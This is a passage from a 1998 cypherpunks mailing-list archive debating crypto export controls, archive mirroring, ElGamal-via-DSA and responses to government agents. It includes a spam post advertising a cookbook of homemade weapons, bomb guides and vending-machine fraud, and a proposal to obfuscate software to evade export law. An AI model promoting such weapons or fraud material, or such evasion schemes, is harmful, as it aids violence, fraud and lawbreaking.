>
>The protocol proposed in this article allows untraceable pseudonymous
>entities to cooperate with each other more efficiently, by providing them
>with a medium of exchange and a method of enforcing contracts. The
>protocol can probably be made more efficient and secure, but I hope this
>is a step toward making crypto-anarchy a practical as well as theoretical
>possibility.
>
>======================================================================
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Tue, 8 Dec 1998 17:46:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls
Message-ID: <3.0.32.19691231160000.006fd6e8@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



This brings to mind again a method of distribution that I've thought for
some time and has probably been discussed on this list before.  In this
distribution method, as long as there is the opportunity to cooperate ahead
of time and out of band, there is the potential for retaining the ability
to provide access any binary data that would be subject to unwanted control.

The scheme is just a variation of secret sharing and all that is necessary
is for several different entities to replicate portions of the desired
software, which portions in and of themselves cannot be subject to any
control.

For (a trivial) example take the image of PGP zipped up for download.
Three different sites create a unique portion of that image for themselves,
for example, each site takes every third byte, and throw in some additional
obfuscation by each site XORing their portion of the image by some
additional data available at a fourth site such as a collection of
cypherpunk list text.

It then is trivial to reconstruct the desired image from the independent
sources, while none of the sources themselves can be subject to controls
without having to go down the rat hole of having to define what really
constitutes the restricted material -- either in all possible forms, or in
terms of all possible transforms applicable to the partitioned source
material.  Otherwise it could be argued that there is a function and that
takes the image of an ASCII representation of Herman Melville's Moby Dick
into the image of PGP.ZIP and therefore Moby Dick is an export controlled
item.  Or is the transform the export-controlled item?  Or what?

Eh?

At 09:38 PM 12/7/98 -0500, Robert Hettinga wrote:
>
>
>--- begin forwarded text
>
>
>X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use
>HELO protocol
>To: cryptography@c2.net, gnu@toad.com
>Subject: Building crypto archives worldwide to foil US-built Berlin Walls
>Date: Mon, 07 Dec 1998 15:23:54 -0800
>From: John Gilmore <gnu@toad.com>
>Sender: owner-cryptography@c2.net
>
>The US Wassenaar initiative is an attempt to deny the public not only
>all future strong crypto developments, but all existing ones.  As
>today's message from Denmark makes clear, the freedom-hating
>bureaucrats are threatening to prosecute a citizen merely for
>publishing PGP on his web page.
>
>Let's at least ensure that they don't eliminate *today's* strong
>crypto, by replicating crypto archives behind each Berlin Wall they
>threaten to erect.  Today we depend on a small number of archives (in
>a small number of countries) containing source and binaries for PGP,
>SSH, Kerberos, cryptoMozilla, IPSEC, and many other useful crypto
>tools that we use daily.
>
>Let's replicate these archives in many countries.  I call for
>volunteers in each country, at each university or crypto-aware
>organization, to download crypto tools while they can still be
>exported from where they are, and then to offer them for export from
>your own site and your own country as long as it's legal.  (The
>Wassenaar agreement is not a law; each country has merely agreed to
>try to change its own laws, but that process has not yet started.)
>
>And if at some future moment your own government makes it illegal for
>you to publish these tools, after all your appeals are denied, all the
>pro-bono court cases rejected, and all the newspaper coverage you can
>get has been printed, then restrict your web site so that only your
>own citizens can get the tools.  That'll still be better than the
>citizens of your country having NO access to the tools of privacy!
>
>(I suggest putting these tools on a Web site on a machine that you
>own, rather than on a web site where you buy space from someone else.
>That way there'll be nobody for the freedom-squashers to threaten
>except you.)
>
>I'm sure that John Young's excellent http://jya.com site will be happy
>to provide an index of crypto archives around the world, if people
>will send him notices at jya@pipeline.com as your sites come up.
>(Each archive should locally mirror this list, so that we won't depend
>on a single site.)
>
>Rather than having their desired effect of squelching crypto
>distribution, perhaps their overbold move can inspire us to increase
>strong crypto distribution tenfold, by making it clear to the public
>that if you don't keep a copy on your own hard drive, the governments
>of the world will be merciless in scheming to deny you access to it.
>And if crypto developers have to publish on books, or rely on
>smugglers to get crypto from country to country, then at least each
>country will have its distribution arrangements already ready for when
>the book is scanned or the smuggler arrives.
>
>	John Gilmore
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JCousino@aol.com
Date: Tue, 8 Dec 1998 16:52:25 +0800
Subject: Information you need
Message-ID: <b52c92ea.366ccc18@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



The Sanarchist Cookbook

Known as the world most forbidden information source and outlawed in many
nations this book was thought to be banished from the face of the Earth.

HUGE FORBIDDEN INFORMATION LIBRARY
220 pages of the massive book of Anarchy 

Learn the tricks of the trade written by the skilled hands of the Sanarchist.
Including massive amounts of information on building home made weapons like
the potato shooter to making dollar bills that can be used continuously in
coke machines this book can pull you out of any jam.  If you are interested in
those great WWII bomb guides & handbooks this thing has them all!

We are set out to distribute this book to anyone that is interested and it
comes by mail(sorry we can't post it on the web because no web server will
support us).  

We have been selling this product for almost two months now and have processed
hundreds of orders.  This book is great, we have had no complaints on it, and
we will never have any complaints on it its so good.  If this is the only
product you ever order off the Internet then you have picked a good choice.
Our price is low and the product is great!

Send payment of $6.50 to the address below to receive your cookbook by mail.
K.C. Smith
933 Birchwood Court
Evansville, IN 47710

I am giving you my address and information so clearly this is not a sick
scheme to take your money.  I don't know about you but the last thing I wantis
hundreds of people beating my car with a baseball bat wanting their cookbook.
This is a great gift, I give you my word on that.

Expect 3-7 Days to Receive your cookbook. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 8 Dec 1998 09:41:41 +0800
To: Markus.Kuhn@cl.cam.ac.uk
Subject: Re: (fwd) Markus Kuhn on eternity
Message-ID: <199812080103.CAA09925@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Markus Kuhn writes:

> The main research aspect of this project is the joint administration of
> such distributed archives. For spam protection, you still need people
> who decide, which files are allowed on the distributed server
> infrastructure, and which are not. This administration is so far the
> weak link in the Eternity Service concept, because whoever decides that
> something is not spam takes over some responsibility for the content,
> and is therefore subject to legal power of national powers.

It would seem that it is the provider of the content, not the filterer,
who is subject to legal authority.  If I set up an open FTP site and
allow anyone to post anything there, I can be legally forced to shut
down once copyrighted software and child pornography appear.  It has
nothing to do with my filtering, it is my providing of the material that
is objectionable.

The Eternity concept has always been vague about exactly who is anonymous.
There are many parties involved: the ones who submit material to the
Eternity service; the ones who decide what material will go onto the
service; the ones who own and maintain the machines which hold the
material; the ones who receive requests for the material and supply it
in response; the ones who request material and receive it.

We need a more careful analysis of Eternity in terms of what levels of
anonymity are possible and necessary for each of these roles.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Tue, 8 Dec 1998 19:20:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Building crypto archives worldwide to foil US-built Berlin  Walls
Message-ID: <3.0.32.19691231160000.007048c0@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:53 AM 12/8/98 +0200, Tim Griffiths wrote:
>
>x wrote:
>> 
>> This brings to mind again a method of distribution that I've thought for
>> some time and has probably been discussed on this list before...
>> For (a trivial) example take the image of PGP zipped up for download.
>> Three different sites create a unique portion of that image for
>> themselves, for example, each site takes every third byte, and throw
>> in some additional obfuscation...It then is trivial to reconstruct
>> the desired image from the independent sources, while none of the
>> sources themselves can be subject to controls without having to go
>> down the rat hole of having to define what really constitutes the
>> restricted material...
>
>1. What is the point of the obfuscation? If it's not legal to do it
>openly, then it's certainly not legal to hide the fact your doing it.
>"The accused did it in such a way as to demonstrate that he was aware
>of it's illegality".

the point is not to hide anything; the point is to expand, arbitrarily (and
this was a trivial example), the f() that takes bits from a controllable
image to one that is not.

>
>2. By your example, you could also take a cruise missile apart, and
>ship each part separately. After all, none of it is actually a missile.

in a cruise missle, there will be certain parts -- e.g. the warhead
explosives? -- that are still identifiable as controlled.  taking apart the
missle by n people where n is the number of 'parts' will result in some
subset of participants possessing components that implicate them in an
illegal act.  this is simply not true of bits.  What is the bit sequence
that defines "munition"-ness?  My point is that there is no hard point at
which that can be defined, when you start talking about mappings from a
controlled image to some other images which cannot be controlled. 

>
>However I 'export' PGP from the US, I'm exporting it, even if I have a
>web site for each bit, 0 or 1 being determined by whether Clinton has
>a cigar or not in a posted picture.

You're just asserting the assumptions I am trying to examine, and this is
not helpful.  You're also assuming a single participant, with
accountability.  I am assuming multiple participants, and that they're
acting independently; let's expand this to say that one individual provides
the 'algorithm' for the mapping, and any other participants are free to
obtain their image out of band legally, and implement this algorithm on
some portion of the image, publishing the result.  Whom do you arrest?
Where is the culpability?

If the algorithm defines that there be 256K subimages of the original, one
for each byte, say...can I be arrested for choosing to post f(byte
123,456)?  Or do I get arrested for publishing f(byte 123,456) PLUS the
information that identifies this byte as corresponding to byte 123,456 in
the reconstruction of the original?  I honestly don't know where this goes,
but to just make a blanket statement like you did doesn't really add anything.


>Yes, the law is inconsistent (let alone stupid). Not, I wouldn't want
>to try this and expect to be immune from prosecution.
>

>Tim G
>
>--
>Tim Griffiths                   griffith@wis.weizmann.ac.il
>Center for Submicron Research   http://tim01.ex.ac.uk
>Weizmann Institute of Science   (972)-8-934-2736
>Rehovot 76100 Israel
>
> 'I have sat and listened to the arguments of men,
>  and I tell you they are shallow movements in space
>  tied to reality only by the ego of their minds.' -DF
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wbclinic@efn.org
Date: Tue, 8 Dec 1998 20:39:22 +0800
To: cypherpunks@toad.com
Subject: WE RULE!
Message-ID: <0012547854.JAA00147@longtom.efn.org>
MIME-Version: 1.0
Content-Type: text/plain



Out webpage is better than anyone elses page on the net, and we offer the 
help for disadvantaged that no one can! Can't solve your problems? We CAN!
We learned the ancient trick to solving all emotional problems, but it'll
cost you unless you are poor and can prove it. WRITE US TODAY!

White Bird Clinic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Tue, 8 Dec 1998 12:20:04 +0800
To: "William H. Geiger III" <cypherpunks@Algebra.COM>
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812062023.PAA001.79@whgiii>
Message-ID: <366CAFEE.583BC1DE@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III wrote:
> 
> In <366A26C2.30D6892E@nyu.edu>, on 12/06/98
>    at 01:40 AM, Michael Hohensee <mah248@nyu.edu> said:
> 
> >William H. Geiger III wrote:
> >>
> >> In <36694C23.B4CB9509@nyu.edu>, on 12/05/98
> >>    at 10:07 AM, Michael Hohensee <mah248@nyu.edu> said:
> >>
> >> >Then we're back to doing it in the open.  Less concentrated cities might
> >> >last a while longer, but not much longer.  There's no getting around it,
> >> >we *need* working sewer systems to have modern cities.  Otherwise, the
> >> >cities die.
> >>
> >> And you say this as if it is a bad thing.
> >>
> 
> >Well it is, sorta.  I've got the misfortune to live in NYC, as do many
> >many many other people.  People who (like me) aren't particularly
> >interested in dying of disease and/or starvation.  If the "shit hits the
> >fan", we're in for a serious mess, in any event. :/
> 
> It is your choice to live in the cesspool know as NYC. I am originally
> from Chicago, I got the hell out of there the 1st chance I got and have
> never looked back.

I've been to Chicago exactly once.  I went to the Sears Tower,
and with the exception of the lake, *ALL* I could see was city
and smog!  I will not go back.


> Large metropolitan complexes are obsolete and their problems greatly
> outweigh their benefits. I am a land owner and *like* owning land, I enjoy
> having grass and trees, streams to fish and swim in, not living in a cage
> with my neighbors on the other side of a paper thin wall. I have enough
> land that I could plow it up and do subsistence farming to survive if the
> collapse ever comes (subsidized with fishing and hunting).

My "cage" is in the suburbs, but I have to agree, it is still
a cage.  I can't wait to get my own land.

> Why anyone would want to live like a rat is beyond me.

Some people are born and raised that way.  They don't know 
anything else.  And what they don't know, scares them.

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 20:52:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Quick ping about Surety Technologies
Message-ID: <v04020a45b292bcdfa90b@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Tue, 8 Dec 1998 00:17:17 -0500 (EST)
From: <Somebody>
To: rah@shipwright.com
Subject: Re: Quick ping about Surety Technologies

> *That*'s interesting. Haven't heard it before. If you want, I'll bounce it
> around.

If you would, that would be interesting.  The patent info on their web
site includes:

	Method for secure timestamping of digital documents.
	U.S. Patent No. 5,136,647, issued August 4, 1992.
	U.S. Patent Re. 34,954, reissued May 30, 1995.

	The initial patent issue covers a variety of fundamental
	technology and algorithmic components of digital
	timestamping. More specifically, the claims cover:

	* Any use of an outside party's digital signature to timestamp
	  a document.
	* The "hash-and-sign" method in which the outside party receives
	  the one-way hash of the document to be timestamped.

I distrust software patents, but even that aside, these sound really
broad to me.  More info at <http://www.surety.com/patent_overview.html>.

<snip>

<Somebody's .sig>
--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 8 Dec 1998 13:44:28 +0800
To: bennett@peacefire.org
Subject: Re: DSA for encryption
Message-ID: <199812080525.GAA32479@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 06 Dec 1998 22:25:57 -0600, Bennett Haselton <bennett@peacefire.org>
wrote:

>I'm working on an enhancement to a Web-based program that allows you to
>circumvent proxy server censorship by sending a request for a Web page to a
>computer in the outside world that is not blocked by the proxy, and having
>that computer re-send a copy of the banned page back to you.

Good idea!

>Of course, any manufacturer of Internet censorship proxy server software
>could easily add ians.ml.org to their list of blocked sites (as they have
>all already done with Anonymizer), so the idea would be for people to get
>their friends to set up port-forwarding programs on computers that were not
>blocked by the censoring proxy, and those could be set up to relay requests
>between the IANS server and the computer behind the proxy server.

It may not be so easy to get people to set up port-forwarding programs.
These could be a target for hackers seeking to cover their tracks as they
try break-ins.  Also, how many people in this day of commercial ISPs are
able to set up port-forwarding programs?

It would seem more promising to make your web page script be simple
and portable enough that even users of AOL and free webpage hosts like
GeoCities would be able to install it.

>I am working on a JavaScript form that could be used on the client side to
>solve this problem.  We would like to use DSA to encrypt the requests sent
>using IANS, since I've heard DSA can be used for encryption without
>royalties, unlike, for example, RSA.

DSA per se is probably not your best choice - unless you already have a
DSA implementation which you want to try to use.  DSA is a signature
algorithm, and while it is sometimes possible to use a DSA implementation
to do encryption, it is not particularly convenient.

What you want to do is to use the mathematical principle behind DSA, which
is the difficulty of solving the discrete log problem, and use an encryption
algorithm which relies on that same math problem, namely Diffie-Hellman or
ElGamal encryption.

If you need to use DSA, Bruce Schneier describes in his book Applied
Cryptography how to get the effect of ElGamal encryption.  Here is what
he writes, on page 490:

: ElGamal Encryption with DSA
: 
: There have been allegations that the government likes the DSA because it is
: only a digital signature algorithm and can't be used for encryption.  It is,
: however, possible to use the DSA function call to do ElGamal encryption.
: 
: Assume that the DSA algorithm is implemented with a single function call:
: 
:     DSAsign (p, q, g, k, x, h, r, s)
: 
: You supply the numbers p, q, g, k, x, and h, and the function returns the
: signature parameters: r and s.
: 
: To do ElGamal encryption of message m with public key y, choose a random
: number k, and call
: 
:     DSAsign (p, p, g, k, 0, 0, r, s)
: 
: The value of r returned is a in the ElGamal scheme.  Throw s away.  Then,
: call
: 
:     DSAsign (p, p, y, k, 0, 0, r, s)
: 
: Rename the value of r to be u; throw s away.  Call
: 
:     DSAsign (p, p, m, 1, u, 0, r, s)
: 
: Throw r away.  The value of s returned is b in the ElGamal scheme.  You now
: have the ciphertext, a and b.
: 
: Decryption is just as easy.  Using secret key x, and ciphertext messages
: a and b, call
: 
:     DSAsign (p, p, a, x, 0, 0, r, s)
: 
: The value r is a^x mod p.  Call that e.  Then call
: 
:     DSAsign (p, p, 1, e, b, 0, r, s)
: 
: The value s is the plaintext message, m.
: 
: This method will not work with all implementations of DSA.  Some may fix
: the value sof p and q, or the lengths of some of the other parameters.
: Still, if the implementation is general enough, this is a way to encrypt
: using nothing more than digital signature function.

If you need more information about what the various values mean, or how
to create a DSA and/or ElGamal key, just ask.

Really, ElGamal is simple enough that if you have access to a large-number
math package, writing your own is probably easier than trying to get DSA
to do it.  It is unlikely that you will find a DSA implementation which
allows you to specify all the needed parameters above, particularly h
and k.  Usually h is forgotten after key generation and not used during
signature, and implementions will probably want to choose k themselves
since it is a very sensitive parameter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Dec 1998 20:24:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Wiretap Operation Sheds Light on LAPD Tactics
In-Reply-To: <199812072323.AAA32006@replay.com>
Message-ID: <199812081158.GAA20172@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:23 AM 12/8/98 +0100, Anonymous wrote:
>If it is Monday, December 7, 1998, you can go to
>http://www.latimes.com/HOME/NEWS/STATE/topstory.html and read about how
>Los Angeles police wiretapped a small cellular phone service provider
>because his policies were too helpful for drug dealers.  He didn't try
>hard enough to verify customer names, he sold cell phones with built in
>scramblers, he allowed customers to change phones and numbers easily.

So when are the cops going after Radio Shack, Sprint, Omnipoint, Bell
Atlantic, etc that sell card-fed phones in the New York area?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 22:15:04 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812081346.HAA09950@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
> Date: Tue, 8 Dec 1998 14:11:14 +0100 (NFT)
> From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)

> According to Jim Choate:
> 
> > And this is different from yesterday how?
> 
> It is different in that it has been legal to distribute PGP and any
> other public domain and mass market crypto software from Denmark
> up to now.

Ah, so the call is for folks in Denmark to post the various pieces of
currently available software then, not everyone on the planet as it appears.

Don't think so.

He's asking that people put PGP and other available software on their
websites without the current export controls. If he's not then he's not
doing anything except blowing empty bugles because people are already doing
what he's asking for. In that situation he's after reputation capital,
personal gain.

> > Are you offering to put up your monies to provide any and all legal and
> > other support for any such site that participates? When is your site going
> > up?
> 
> John Gilmore's RSAREF site went up about a year ago. Your point being what?

Exactly what it states above. If you don't get it to bad.

RSAREF is not quite what he is asking folks to do now is it.

Bottem line, Gilmore is asking folks to run out and put their livelyhood and
their life at risk. What's he going to do for those who comply with his 
request?

Let me ask you this Ulf, when is YOUR site going up? When will YOU be the
first European repeater for the CDR? Your address implies you're in Denmark.
What are you going to do for YOUR liberty today? Has Gilmore agreed to
help fund YOUR fight of the change in your courts?

Bottem line, when will you get off your butt and put your neck in the noose
like many of the rest of us?

The reality is that the change in Denmark's law changes the global picture
very little.

Now when Denmark quites letting people IMPORT PGP *and* places like the US
quite letting people export it in some media (currently paper & ink) then
you'll have cause to really be indignent.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 22:06:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812081349.HAA10098@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 8 Dec 1998 11:39:33 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)

> > And this is different from yesterday how?
> 
> What's different is that this is Denmark now.  Before it was just the
> US.

And Canada, France, England, China, South Africa, etc., etc., etc.

It was NEVER *just* the US.

> > Are you offering to put up your monies to provide any and all legal and
> > other support for any such site that participates? When is your site going
> > up?
> 
> John said that people should put up per country mirrors first globally
> accessible, but if required by local laws / harrassment to stop doing
> that make them accessible only in the country.

And this reduces their footprint with their LEA's how?

> As a fall back position as I understand it, so that all the useful
> crypto apps are still available.

Which doesn't change my original question one whit. What is Gilmore going to
do with his may resources to protect those who participate?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 22:12:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin  Walls (fwd)
Message-ID: <199812081354.HAA10195@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 08 Dec 1998 12:53:51 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin  Walls

> Tim Griffiths wrote:
> 
> > However I 'export' PGP from the US, I'm exporting it, even if I have a
> > web site for each bit, 0 or 1 being determined by whether Clinton has
> > a cigar or not in a posted picture.
> 
> Hence the best way, once there are strict export regulations, is not 
> to export. One moves rather knowledge (thought) across the country 
> boundaries and there build locally the desired software. That's why 
> I believe it will be increasingly more essential for the future to 
> have good crypto algorithms that are very simple to describe and
> implement.

Interesting aspect to a cypherpunks archive. Archive the software as well as
the technical documentation required to write it from scratch.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 22:19:09 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin (fwd)
Message-ID: <199812081357.HAA10256@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 08 Dec 1998 02:28:18 -0800
> From: x <x@x.com>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin
>    Walls

> >1. What is the point of the obfuscation? If it's not legal to do it
> >openly, then it's certainly not legal to hide the fact your doing it.
> >"The accused did it in such a way as to demonstrate that he was aware
> >of it's illegality".
> 
> the point is not to hide anything; the point is to expand, arbitrarily (and
> this was a trivial example), the f() that takes bits from a controllable
> image to one that is not.

In other words, hide it. A distributed stego hash algorithm.

It quacks like a duck. It waddles like a duck. It swims like a duck.

It would actualy be criminal collusion and would give the LEA's in the
relevant areas the necessary reason (ie probable cause) to act in concert,
creating a bigger big brother.

Hardly a cpunks goal.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Dec 1998 23:18:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: The problem with 'Gilmore's RSAREF' site...
Message-ID: <199812081450.IAA10578@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Here's the bottem line issue with Gilmore's RSAREF site.

It isn't Gilmore's, it's EFF's.

It isn't Gilmore's butt on the line as it would be for person who
participate in his call to action.

What's EFF going to do to protect those participants? Nothing.

What's Gilmore personaly going to do to protect those participants? Nothing.

He's asking others to put their butt in the line of fire while he sits
safely in a rear area.

In effect he's asking YOU to be cannon fodder for his rights.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Dec 1998 23:18:29 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812080331.VAA07823@einstein.ssz.com>
Message-ID: <199812081419.JAA21468@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



In response to John Gilmore's call for a foil to US-Wassenaar
restrictions acoming, we've put up a preliminary list of international 
cryptography sources for mirroring:

   http://jya.com/crypto-free.htm

This is a quick starter-kit and is far from comprehensive.
Contributions welcome.

Ken Williams offers an impressive (177MB) crypto/stego archive:

  http://www.genocide2600.com/~tattooman/cryptography/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 9 Dec 1998 03:45:52 +0800
To: cypherpunks@cyberpass.net
Subject: Government-enraging programs
Message-ID: <366D66F0.E1DC0F7B@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
> What would help is a list from experts on what are the most gov-enraging 
> programs. We'd like to offer a few of those on jya.com, to test BXA's up-and-
> running crypto-enforcement program, maybe get some jail and trial pleasure,
> it's been too quiet on Bernstein, Junger, Karn, et al, a deliberate gov-stall,
> awaiting Wassenaar.

One way to determine which programs are the best for this purpose would be
to study what various governments have taken some action on.  Some obvious ones:

  PGP (various versions, high level of government interest)
  Snuffle (extended US litigation)
  All the AES candidates (strictly-controlled dissemination from NIST)
  SecureOffice (Charles Booher's program -- US government has taken action)
  Applied Cryptography disk (US export license denied)

It would also be nice to have an infrastructural component, such as (when
ready for mass distribution) the Linux/FreeSWAN IPSec release; this doesn't
have quite the cachet of programs on which the government has already weighed
in, though.
-- 
	Jim Gillogly
	Sterday, 18 Foreyule S.R. 1998, 17:40
	12.19.5.13.11, 10 Chuen 4 Mac, First Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 01:12:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The problem with 'Gilmore's RSAREF' site... (fwd)
Message-ID: <199812081627.KAA11330@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 08 Dec 1998 10:45:56 -0500
> From: Duncan Frissell <frissell@panix.com>
> Subject: Re: The problem with 'Gilmore's RSAREF' site...

> 
> Save that the cowards have never busted anyone for crypto exports.  It's
> dead letter law.  They know they'd lose a criminal case against a civilian.
> 

So, when do you bring your site with unconstrained access to PGP up?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Dec 1998 00:31:35 +0800
To: "Blanc" <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <v03130326b28cc1ba69cb@[209.66.100.75]>
Message-ID: <199812081533.KAA12935@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:39 PM 12/3/98 -0800, Blanc wrote:
>(Yes, but how do you actually respond to a real
>live representative standing at your door (they showed me their Batches),
to a
>real-live situtation when you are taken to a little room and asked to strip
>("asked"?) at the airport?)   

I was discussing this very question with the inamorata of a member of this
list recently in San Jose.  We were trying to figure out why I knew
instinctively what to say when confronted with government agents and she
didn't (though she is an attorney).  I figured out that it was because I
read Heinlein.  He taught a lot about how to respond to these things.
Those who haven't read Heinlein (or don't learn from books) won't know what
to say.  And in these high stress situations, answers which you have
thought about in advance or conducted mental simulations with will come out
more easily.  

You say - "Go away."  "Write me a letter."  "I only deal with government
agents via my lawyer."  "Where's Your Warrant."  Or how about -- "My
